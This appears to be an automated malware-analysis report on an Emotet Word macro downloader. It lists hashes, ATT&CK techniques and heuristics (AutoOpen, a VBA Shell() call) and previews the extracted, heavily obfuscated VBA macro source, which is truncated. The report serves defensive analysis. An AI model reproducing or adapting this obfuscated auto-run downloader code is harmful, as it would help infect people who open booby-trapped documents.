Emotet Office (OLE) malware analysis — malicious · 4fdd097901d1e709

MALICIOUS

Office (OLE)

193.6 KB Created: 2018-09-24 16:54:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: c442627df2cf45ae0a7a43adc735c253 SHA-1: 695b452efb3bda9cfd31ed32dbcf8b4269de8807 SHA-256: 4fdd097901d1e709faaf19c845877ea8ae21b6dd4cc72ce97d869c38df0a094a

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The presence of an AutoOpen macro and the ClamAV detection of 'Doc.Downloader.Emotet-6884097-0' strongly suggest this is an Emotet downloader variant. The VBA script is designed to execute a secondary payload, likely downloaded from a remote source, which is a common Emotet behavior.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6884097-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884097-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 164849 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	164849 bytes
SHA-256: `f2db31beb259b7f30e1f53b4dfd2b8a07542419f9c5fd9c266338c5b9c666a0a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "sOwUDvADpkl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QDZSli(1) QDZSli(0) = Mid(DKqQAtcwCA + GVuPwVDPJWjnNhsrfowFSwFHvjCwuVz + IKWQioPjjKdnLj, 97, 437) + MidB(jJQcQrOHiHZjK + njjIaRzjYinbjzzalfdjtfCXFIH + pDYzYNiZjdstdP, 897, 455) + MidB(zufYQJDm + uuXQfnmQLzMCGfqlPHzUzIIUQ + wljKipFbO, 789, 547) + Mid(okmrYtaY + NRuaYIXTWdBncsbpkKndnfOVQwWLq + WtkPjTqWF, 8, 313) Dim UHhXn(1) UHhXn(0) = Left(dCrRrwkC + pXzRiwIvdLwuNNdptCBGDwzNdCFIfu + wBnpIYcKZJ, 204) + Mid(DOGrbtZoQtU + fsYDTYPtObCDTarhulZowQDAEfhHSK + jlVpmtlonEoJa, 983, 947) + MidB(ipCGEanPXKNjTj + aqFLEzzzkAtcuaiwIjUfLiZOiXHTVuO + rYvjrEVD, 632, 207) + Left(FfiLzYZoLucikP + hYhjbzqZMAdQciYERYIVWpKwzwQwci + IdpVHoJwzv, 165) Dim KzwEpO(1) KzwEpO(0) = MidB(aoHuJmGWASFWXG + ZDqhFhcWsRLRzVclUvFXjkzFiKRZD + imXLpsL, 705, 48) + Left(oWhwckDKuPE + wGcuLasHuojFZfrSiFvcXlijVsFp + MPjQQYb, 3) Dim jlWhN(2) jlWhN(0) = Mid(skBCOYXits + outAvJKrwnSjUfhHYcMhtICL + UPBtYGInk, 508, 452) + Left(dKwiTttq + imlcNArtwfiblZLOWumUTiWzZjRkWu + GmdunthYXi, 28) + MidB(IHiXwEzv + tqDSJjuHhRTYkcHdzohflRbmN + jYpVkDkaXrcXT, 124, 868) + Left(uuoauhUdMLRB + hjrBtiDAYXCfWUNYsbrsPprUrXsSZpzv + EzLjtWRXPKA, 222) jlWhN(1) = Right(YZqBOucMBJLc + dpYYamTQLzwUrajZFuAzvhwzsw + QqNuZmbkMS, 605) + Right(CSakmVoiDaJ + crinbuOqiFGzAtvMmPrUtOGcNqNQDRi + GZrkuoUMTnlb, 909) Dim tMWKYH(1) tMWKYH(0) = Left(lBEAdEIduW + EOdsKvmcrinYAiWzlFSnDI + LIvhdDK, 450) + Right(izcVXEuWQcdZ + XYiGmbakwaUXJAjOchWVPiOsjrmcmZ + FZDlDIuD, 730) Dim nulWjd(1) nulWjd(0) = MidB(VRBzVoDfSk + nvizfYBCaUBRHdJjLaGWSsozYQ + qltCsPnqK, 522, 111) + MidB(QjswLtz + DrnYLEqZmSBLjNTsUPfsCVCJwANWI + hCPTEjAkzTf, 986, 97) + MidB(iazGlvYzlCI + YQPJofzLEQpJUiYWWzGQWCbkICiRvoF + DVLZDTZJKzQQ, 834, 506) + Right(KodCdtHMuqI + tUPSzVALYCzwdLKURcPAbKEKOwiNLzJ + AzrENUmljFz, 640) zFmdAErIntC (KeyString(vbKeyC) + KeyString(vbKeyM) + saiMuQ + hINZYk + SVvja + sKKzpL + hhcvJ + YfKPIUoIuLm + plwUucJWZXCPw) Dim EFcLwE(1) EFcLwE(0) = MidB(puJIMpztbHt + IfnarDzHIzJFtDiaQoBGGZzhciaIFSzv + lEApXhvACTlHK, 22, 820) + MidB(oBFCGuWXdhqDmt + spMoLiZikdvUTZRLtTniJdRuz + PZdrRMiPiGcaSp, 324, 526) + Right(IZCOiOwF + KtnZaoBRdBNnERsUptCPlritB + uMBcFoTDA, 568) + MidB(JYHvlQZdw + VJHiBhvuAMBiLLjAkNsrsqiwsccNSrb + zKRVEinAH, 812, 337) Dim oLjiZ(2) oLjiZ(0) = Right(ziEKHNnwwEKAwY + inZMaOBuanEpPVERuHJchlSAAOVv + qwrAdVjdKkTdiH, 686) + MidB(jCjONYK + HOAfEsFJwQioZGAzDCLQRJms + dajIBOUcijb, 456, 491) oLjiZ(1) = Right(EAvdcNPzC + vzjWRzJcVqwmKlYTsjDzMIrPSSNad + TWtIOcNwmcH, 87) + Right(rpwGWIvrA + ajrKHPTcIOfKiESjREizadRU + hcWWvosW, 743) + MidB(ncAbdKlcR + ajRJrmQjqMRaOsIPqtmHRchVzSfsqVS + FmwFFFoSbLZMl, 36, 433) + Mid(uVnYzjK + OKCVvHNBDtGpowpqIMQJGkbz + FFmonrdPF, 297, 337) Dim kYsjKt(1) kYsjKt(0) = Left(PnXlCSYwirO + jpSroINflAMNSDUjjhMpikBQPCYzCEiAiZr + GwimKXkZUdzK, 628) + MidB(BSYHmsw + BKJjsUuszGrDkQrvYZoWl + PBkksIURlAOAjz, 675, 136) + Right(LMzinuVACEmM + FtFsIaEwWmkzPKvpSoSBhOpOrFQfZ + vnuqwafMpLjCw, 116) + Left(PUXBwmrX + LMtGGZYGUBwTOHNzMsIBzAKBLuJw + jOSTjEKi, 820) Dim FQAJt(1) FQAJt(0) = Right(AaSZDLvG + NLKaimnAptlnhCWisjRLAvwtGKGXdIm + btbdNJEpPOm, 698) + Left(dDXlfvzJiith + WQdBRWuoQFzjVljKJiUGWGVjROtkf + TwllTBmomR, 781) + Mid(dYzYkwMFBKGu + daXURPsCnvYphphohJnCtAjGQRniqXK + OzXhpbkCz, 887, 337) + Right(TWYlInjIC + IbkzQhSWjbTqczbIPPkAwRFF + ZFLdnYNqll, 335) Dim krGYi(1) krGYi(0) = Right(wwZjbQATK + LQUHaWJimbsPRjtOIWwzLjjCz + oDAVpYCdRkOz, 987) + MidB(GJSulVawws + IXtTMEFXXubIbCbittodXkCpLOHEccF + YQCvujw, 278, 287) + Left(JTwRCVNZTuWi + tJQmRwDhzNqbEMItQfsPpBH + aKBhtjAXibz, 850) + Left(VvEMuINdfOp + AtblKjXHmBfzEoHnLBhDlpNFSwfnsA + iHqmIMUjuYPwEY, 428) Dim qoAfOI(1) qoAfOI(0) = MidB(btjNUYbm + cCzGVHNXjlXdEtLzmrzFKwL + SAmDDapZv, 688, 368) + Right(qEabEPcjA + pvTfzpIKcFDzhTDPFsEUBsijt + jRVVOHG, 186) + Mid(bIQTlBc + LNiaUXkbSnTGOaSnhbzFdTijoB + BpJjoBr ... (truncated)

SHA-256: f2db31beb259b7f30e1f53b4dfd2b8a07542419f9c5fd9c266338c5b9c666a0a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "sOwUDvADpkl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QDZSli(1)
QDZSli(0) = Mid(DKqQAtcwCA + GVuPwVDPJWjnNhsrfowFSwFHvjCwuVz + IKWQioPjjKdnLj, 97, 437) + MidB(jJQcQrOHiHZjK + njjIaRzjYinbjzzalfdjtfCXFIH + pDYzYNiZjdstdP, 897, 455) + MidB(zufYQJDm + uuXQfnmQLzMCGfqlPHzUzIIUQ + wljKipFbO, 789, 547) + Mid(okmrYtaY + NRuaYIXTWdBncsbpkKndnfOVQwWLq + WtkPjTqWF, 8, 313)
   Dim UHhXn(1)
UHhXn(0) = Left(dCrRrwkC + pXzRiwIvdLwuNNdptCBGDwzNdCFIfu + wBnpIYcKZJ, 204) + Mid(DOGrbtZoQtU + fsYDTYPtObCDTarhulZowQDAEfhHSK + jlVpmtlonEoJa, 983, 947) + MidB(ipCGEanPXKNjTj + aqFLEzzzkAtcuaiwIjUfLiZOiXHTVuO + rYvjrEVD, 632, 207) + Left(FfiLzYZoLucikP + hYhjbzqZMAdQciYERYIVWpKwzwQwci + IdpVHoJwzv, 165)
   Dim KzwEpO(1)
KzwEpO(0) = MidB(aoHuJmGWASFWXG + ZDqhFhcWsRLRzVclUvFXjkzFiKRZD + imXLpsL, 705, 48) + Left(oWhwckDKuPE + wGcuLasHuojFZfrSiFvcXlijVsFp + MPjQQYb, 3)
   Dim jlWhN(2)
jlWhN(0) = Mid(skBCOYXits + outAvJKrwnSjUfhHYcMhtICL + UPBtYGInk, 508, 452) + Left(dKwiTttq + imlcNArtwfiblZLOWumUTiWzZjRkWu + GmdunthYXi, 28) + MidB(IHiXwEzv + tqDSJjuHhRTYkcHdzohflRbmN + jYpVkDkaXrcXT, 124, 868) + Left(uuoauhUdMLRB + hjrBtiDAYXCfWUNYsbrsPprUrXsSZpzv + EzLjtWRXPKA, 222)
jlWhN(1) = Right(YZqBOucMBJLc + dpYYamTQLzwUrajZFuAzvhwzsw + QqNuZmbkMS, 605) + Right(CSakmVoiDaJ + crinbuOqiFGzAtvMmPrUtOGcNqNQDRi + GZrkuoUMTnlb, 909)
   Dim tMWKYH(1)
tMWKYH(0) = Left(lBEAdEIduW + EOdsKvmcrinYAiWzlFSnDI + LIvhdDK, 450) + Right(izcVXEuWQcdZ + XYiGmbakwaUXJAjOchWVPiOsjrmcmZ + FZDlDIuD, 730)
   Dim nulWjd(1)
nulWjd(0) = MidB(VRBzVoDfSk + nvizfYBCaUBRHdJjLaGWSsozYQ + qltCsPnqK, 522, 111) + MidB(QjswLtz + DrnYLEqZmSBLjNTsUPfsCVCJwANWI + hCPTEjAkzTf, 986, 97) + MidB(iazGlvYzlCI + YQPJofzLEQpJUiYWWzGQWCbkICiRvoF + DVLZDTZJKzQQ, 834, 506) + Right(KodCdtHMuqI + tUPSzVALYCzwdLKURcPAbKEKOwiNLzJ + AzrENUmljFz, 640)
zFmdAErIntC (KeyString(vbKeyC) + KeyString(vbKeyM) + saiMuQ + hINZYk + SVvja + sKKzpL + hhcvJ + YfKPIUoIuLm + plwUucJWZXCPw)
   Dim EFcLwE(1)
EFcLwE(0) = MidB(puJIMpztbHt + IfnarDzHIzJFtDiaQoBGGZzhciaIFSzv + lEApXhvACTlHK, 22, 820) + MidB(oBFCGuWXdhqDmt + spMoLiZikdvUTZRLtTniJdRuz + PZdrRMiPiGcaSp, 324, 526) + Right(IZCOiOwF + KtnZaoBRdBNnERsUptCPlritB + uMBcFoTDA, 568) + MidB(JYHvlQZdw + VJHiBhvuAMBiLLjAkNsrsqiwsccNSrb + zKRVEinAH, 812, 337)
   Dim oLjiZ(2)
oLjiZ(0) = Right(ziEKHNnwwEKAwY + inZMaOBuanEpPVERuHJchlSAAOVv + qwrAdVjdKkTdiH, 686) + MidB(jCjONYK + HOAfEsFJwQioZGAzDCLQRJms + dajIBOUcijb, 456, 491)
oLjiZ(1) = Right(EAvdcNPzC + vzjWRzJcVqwmKlYTsjDzMIrPSSNad + TWtIOcNwmcH, 87) + Right(rpwGWIvrA + ajrKHPTcIOfKiESjREizadRU + hcWWvosW, 743) + MidB(ncAbdKlcR + ajRJrmQjqMRaOsIPqtmHRchVzSfsqVS + FmwFFFoSbLZMl, 36, 433) + Mid(uVnYzjK + OKCVvHNBDtGpowpqIMQJGkbz + FFmonrdPF, 297, 337)
   Dim kYsjKt(1)
kYsjKt(0) = Left(PnXlCSYwirO + jpSroINflAMNSDUjjhMpikBQPCYzCEiAiZr + GwimKXkZUdzK, 628) + MidB(BSYHmsw + BKJjsUuszGrDkQrvYZoWl + PBkksIURlAOAjz, 675, 136) + Right(LMzinuVACEmM + FtFsIaEwWmkzPKvpSoSBhOpOrFQfZ + vnuqwafMpLjCw, 116) + Left(PUXBwmrX + LMtGGZYGUBwTOHNzMsIBzAKBLuJw + jOSTjEKi, 820)
   Dim FQAJt(1)
FQAJt(0) = Right(AaSZDLvG + NLKaimnAptlnhCWisjRLAvwtGKGXdIm + btbdNJEpPOm, 698) + Left(dDXlfvzJiith + WQdBRWuoQFzjVljKJiUGWGVjROtkf + TwllTBmomR, 781) + Mid(dYzYkwMFBKGu + daXURPsCnvYphphohJnCtAjGQRniqXK + OzXhpbkCz, 887, 337) + Right(TWYlInjIC + IbkzQhSWjbTqczbIPPkAwRFF + ZFLdnYNqll, 335)
   Dim krGYi(1)
krGYi(0) = Right(wwZjbQATK + LQUHaWJimbsPRjtOIWwzLjjCz + oDAVpYCdRkOz, 987) + MidB(GJSulVawws + IXtTMEFXXubIbCbittodXkCpLOHEccF + YQCvujw, 278, 287) + Left(JTwRCVNZTuWi + tJQmRwDhzNqbEMItQfsPpBH + aKBhtjAXibz, 850) + Left(VvEMuINdfOp + AtblKjXHmBfzEoHnLBhDlpNFSwfnsA + iHqmIMUjuYPwEY, 428)
   Dim qoAfOI(1)
qoAfOI(0) = MidB(btjNUYbm + cCzGVHNXjlXdEtLzmrzFKwL + SAmDDapZv, 688, 368) + Right(qEabEPcjA + pvTfzpIKcFDzhTDPFsEUBsijt + jRVVOHG, 186) + Mid(bIQTlBc + LNiaUXkbSnTGOaSnhbzFdTijoB + BpJjoBr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.